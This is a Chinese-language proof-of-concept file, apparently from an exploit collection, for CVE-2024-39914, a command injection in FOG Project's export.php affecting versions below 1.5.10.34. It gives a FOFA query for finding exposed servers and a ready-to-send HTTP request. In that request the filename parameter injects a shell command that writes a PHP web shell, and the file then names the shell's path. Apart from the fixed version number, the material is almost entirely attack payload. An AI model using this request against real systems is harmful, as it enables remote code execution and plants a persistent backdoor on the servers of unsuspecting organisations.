POC/wpoc/fogproject/fogproject系统接口export.php存在远程命令执行漏洞(CVE-2024-39914).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

25 lines
871 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# fogproject系统接口export.php存在远程命令执行漏洞(CVE-2024-39914)
FOG是一款克隆/成像/救援套件/库存管理系统。在版本低于1.5.10.34的情况下FOG中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响该漏洞存在于/fog/management/export.php的文件名参数中。此漏洞已在版本1.5.10.34中得到修复。
## fofa
```yaml
body="FOG Project"
```
## poc
```yaml
POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET['"'cmd'"']);+?>'+>+lol.php)&type=pdf HTTP/1.1
Host: 192.168.15.5
Content-Length: 21
User-Agent: ToxicPotato
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
fogguiuser=fog&nojson=2
```
![victory](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407191238873.png)
文件路径:`/fog/management/lol.php`